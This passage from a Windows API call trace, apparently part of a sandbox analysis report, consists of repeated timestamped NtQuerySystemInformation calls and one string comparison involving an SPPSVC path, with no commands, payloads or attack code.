SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0281.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0281.277] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0281.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0281.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0281.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0281.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0281.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0281.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0281.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0281.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0281.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0281.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0281.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0281.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x50, ResultLength=0x0) [0281.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x50, ResultLength=0x0) [0281.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x50, ResultLength=0x0) [0281.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x50, ResultLength=0x0) [0281.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x50, ResultLength=0x0) [0281.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x50, ResultLength=0x0) [0281.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x50, ResultLength=0x0) [0281.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc6f0, Length=0x38, ResultLength=0x0) [0281.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc520, Length=0x28, ResultLength=0x0) [0281.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc520, Length=0x28, ResultLength=0x0) [0281.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc520, Length=0x28, ResultLength=0x0) [0281.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc520, Length=0x28, ResultLength=0x0) [0281.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc590, Length=0x28, ResultLength=0x0) [0281.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc6f0, Length=0x38, ResultLength=0x0) [0281.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc610, Length=0x28, ResultLength=0x0) [0281.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc610, Length=0x28, ResultLength=0x0) [0281.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc4b0, Length=0x20, ResultLength=0x0) [0281.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc430, Length=0x20, ResultLength=0x0) [0281.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc430, Length=0x20, ResultLength=0x0) [0281.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc430, Length=0x20, ResultLength=0x0) [0281.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc6f0, Length=0x38, ResultLength=0x0) [0281.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc6f0, Length=0x38, ResultLength=0x0) [0281.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc570, Length=0x20, ResultLength=0x0) [0281.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc500, Length=0x20, ResultLength=0x0) [0281.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc500, Length=0x20, ResultLength=0x0) [0281.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0281.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0281.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0281.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0281.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0281.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x28, ResultLength=0x0) [0281.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x28, ResultLength=0x0) [0281.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x28, ResultLength=0x0) [0281.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7e0, Length=0x28, ResultLength=0x0) [0281.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0281.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0281.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0281.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0281.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x20, ResultLength=0x0) [0281.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0281.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0281.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0281.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0281.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x20, ResultLength=0x0) [0281.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x20, ResultLength=0x0) [0281.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x20, ResultLength=0x0) [0281.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0281.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0281.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0281.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0281.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0281.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x28, ResultLength=0x0) [0281.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x28, ResultLength=0x0) [0281.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x28, ResultLength=0x0) [0281.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7e0, Length=0x28, ResultLength=0x0) [0281.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0281.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0281.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0281.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0281.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x20, ResultLength=0x0) [0281.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0281.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0281.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0281.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.321] NtQuerySystemInformation 